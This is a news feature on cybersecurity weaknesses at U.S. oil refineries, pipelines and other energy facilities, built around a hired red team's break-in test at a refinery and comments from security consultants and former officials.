A ship navigates through Buffalo Bayou heading to a dock along the Houston Ship Channel in La Porte.
The computer hacker crouched low in thick brush on a cold December night, just beyond the fence line of his target — a massive U.S. oil refinery.
Wearing night-vision goggles and dressed in black, he swung a rubber mallet into the dirt, trying to produce vibrations to distract the plant’s ground-penetrating radar system. He swung again and again. Flashlights emerged from a distant building, then disappeared.
Soon a train roared by, providing the cover his team needed. Quickly, two more men appeared from the shadows. They threw a wool blanket over a 16-foot barbed wire fence, climbed over and rushed to a small building housing the facility’s vital computer controls.
The door had an electronic lock, a badge reader and a plate to thwart lock picking. But the intruders caught a break. The door didn’t sit properly in its frame, leaving just enough space to shimmy it open.
Within moments, they had planted a small device, about the size of a credit card, designed to begin penetrating the refinery’s controls systems.
“Bingo!” crackled from the radio inside a white SUV adorned with a phony logo of the refining company, some 200 yards away. From there, Jeremiah Talamantes gave the signal to leave — “Rabbit!”
As the other hackers hopped in the van, the driver’s nerves calmed. Then a stark reality set in.
“We’ve used a couple hundred dollars in gear, and we were able to break into a refinery without anyone knowing,” said Talamantes, president and managing partner of RedTeam Security in Minnesota. “The implication is pretty devastating.”
Talamantes was hired by the refinery to test its defenses against cyberattacks and, like so many others, the mission was way too easy. Despite the refinery’s remote location, fencing, high-tech sensors and security team, his team was able to infiltrate its network and potentially wreak havoc.
In recent years, a growing cottage industry of boutique security companies has emerged as oil and gas companies seek outside help to protect their networks. In test after test, private specialists reveal what federal authorities say is a growing national security threat — control systems for valves, pumps, pipelines and refineries are among the most vulnerable targets to cyberattacks.
Often, security firms find that drillers, refiners and pipeline operators run facilities with outdated software and aging automated devices without built-in security. Some companies lack internal detection systems that would allow them to spot cyber intruders.
“We almost always get in,” said Jason Larsen, who leads a team at security firm IOActive that has operations in more than 30 countries. “Most of the time we’re not detected.”
Many energy companies are turning to security specialists to determine whether protocols and defensive software can withstand the creativity and determination of global hackers, said Larry Dannemiller, a cyber insurance broker for major U.S. insurance firms.
“Are all the dollars they’re spending actually making them more secure?” he said. “You have to test it.”
Talamantes shared a detailed account of his firm’s efforts to penetrate the refinery in December, so long as the company’s name wasn’t published. Executives were stunned by the intrusion, he said, believing a successful break-in would have taken a much larger team with more time, resources and expensive gear.
“We proved them wrong,” Talamantes said bluntly.
From the mines of Chile to offshore platforms in the Indian Ocean to refineries in the United States, Jim Guinn has hacked just about every kind of energy facility.
“There’s not a refinery, power generation facility, oil terminal or platform that doesn’t have technology on it that we haven’t been able to infiltrate,” said Guinn, global head of energy security Accenture consulting in Houston.
This grim assessment comes in spite of the industry’s hard-won progress in cybersecurity over the past few years. Before 2010, energy executives largely ignored the threat such attacks posed to their operations, said Gary Leibowitz, a board member of the Houston chapter of InfraGard, a group that works on cybersecurity issues with the FBI and private companies.
That year, the Stuxnet virus damaged thousands of centrifuges within Iranian nuclear facilities, demonstrating how computer viruses could be so destructive in the real world. Since then, many oil companies have made progress in hardening firewalls, bolstering anti-virus software and other defenses and improving cybersecurity practices.
“Companies are spending time and money on cybersecurity, and it’s across the board,” Leibowitz said.
Exxon Mobil, for example, bans its employees from using personal email and USB flash drives that can carry computer viruses and regularly sends simulated phishing emails to test whether workers will click on alluring links or open attachments, executives said at industry conferences. The company, like many other oil and gas companies contacted for this story, declined comment.
The oil and gas industry, however, remains at a disadvantage against sophisticated hackers, cybersecurity specialists said. The sheer size of the industry alone makes it difficult to secure thousands of devices in vast networks of pipelines, refineries and other facilities stretching across the continent.
In contrast, hackers have to look for only a small number of security flaws to exploit these systems, said Philip Quade, who recently retired as chief of the National Security Agency’s cyber task force.
“Just about anything,” he said, “can be penetrated by someone sophisticated and determined.”
Open to the public
In many cases, the resourceful hacker doesn’t need to develop new malware to get access to industrial controls — a simple internet search can do the trick.
A few years ago, Eireann Leverett, a cybersecurity researcher in the United Kingdom, used a public search engine to find more than 7,500 industrial devices that were linked to the internet. Fewer than 1 in 5 required any kind of authentication, such as passwords, to get inside.
Among the devices hackers have attacked through the internet are the lightweight sensors that run along thousands of miles of pipeline across the nation. “We should be worried,” Leverett said.
Compromising a sensor on a pipeline could allow a hacker to alter readings of how much oil and gas is running through the pipeline, which could cause the systems to begin pumping more hydrocarbons, said Alvaro Cardenas, an assistant professor and cybersecurity expert at the University of Texas at Dallas.
“It might cause a pressure blast,” Cardenas said.
A few years ago, hackers succeeded in hijacking the modems attached to remote sensors owned by two North American pipeline and utilities companies, after finding them on a public search engine, said Guinn, one of the cybersecurity consultants that investigated the incident.
A power outage had caused the sensors to reset — effectively, turn off — their security settings, leaving them vulnerable to attack from the internet. In this case, the hackers used these devices to launch cyberattacks against other groups. If they had more nefarious ends, they could have crippled the pipelines, Guinn said.
“It’s possible to demonstrate catastrophic disruption in energy company assets,” he said. “We know it can be done.”
Beyond the internet, industrial controls, sensors and other devices with wireless capabilities or radio transmitters are open to attack by hackers using long-range antennas.
In fact, an off-the-shelf drone attached with a wireless receiver could fly within range of a facility and intercept its wireless signals, according to cybersecurity specialists.
Jeff Melrose, principal security manager at industrial control vendor Yokagowa, piloted three white drones simultaneously over a parking lot in Stafford, demonstrating their maneuverability and potential for extending a hacker’s reach to capture wireless signals.
“Drones are coming into their own, and the things people can do with them will only increase,” said Melrose, noting that energy companies have reported drones buzzing by facilities or crashed with dead batteries nearby.
Security personnel at energy companies are more used to dealing with activists handcuffing themselves to valves, Melrose added. They rarely look up to see the threat from above.
“The question is,” he said, “are you thinking about the deviousness of your adversary?”
The Department of Homeland Security said network scanning and probing accounted for 79 cyber incidents involving industrial controls in 2014 and 2015, but it would not disclose additional details, citing security concerns.
Many companies have adopted advanced encryptions. Still, the most common security setting for wireless networks in energy and other industrial facilities remains the password-protected WPA-2 protocol, used for household wireless networks.
Skilled hackers could break into them in about two hours, said Kevin Dunn, senior vice president at the Austin offices of NCC Group, a security firm based in the United Kingdom.
“If this were a targeted attack,” Dunn said, “whether it be ‘hactivism’ or a nation-state, all they need is time and money and opportunity.”
Simple mistakes by workers can lead to devastating consequences.
Two years ago, Steve Mustard, a cybersecurity specialist for the nonprofit group Automation Federation, was delivering a lecture at a Western oil company’s office in Tunisia when the event came to an abrupt halt. The company’s anti-virus program had detected the destructive Stuxnet virus.
IT workers rushed to phones and computers, discovering an employee had accidentally uploaded the virus by plugging an infected thumb drive into his computer. They quickly tracked down and contained the virus.
Had the employee plugged that drive into a computer at a nearby oil production facility, chances are the company would never have caught the virus. It had no detection systems in place for the computer network controlling operations, Mustard said.
“Spills, potential worker injuries, explosions, fires — all of those things could happen,” Mustard said. “What you’ve got are very vulnerable systems that aren’t managed very well, and on the other side, an exponentially increasing number of threats.”
As Talamantes’ refinery caper shows, hackers don’t have to limit themselves to the internet to break into computer networks.
With long-range cameras, they can spend days watching workers entering front doors, so they can mimic their behavior and exploit weak spots to get inside, Talamantes said.
Before Talamantes and his team raided the oil refinery in December, they staked out the company’s corporate offices. They watched employees at nearby coffee shops and restaurants, managing to steal and clone badges.
Talamantes said he tries to stay within the bounds of what real hackers can do with a modest investment. In the refinery raid, his team carried only a small amount of gear, including a laptop, lock-pick set and a $35 device to tap the computer systems, all available on Amazon.
They used two 16-foot ladders, which they returned to Home Depot for a full refund, a set of four two-way radios and lock picks. Over the course of his career, Talamantes said, such tests have found plenty of security weaknesses, cyber and otherwise, that should worry the energy industry.
But the scariest part, he said, is that so much of hacking is low-tech, requiring little expertise.
“Anyone can do these types of things.”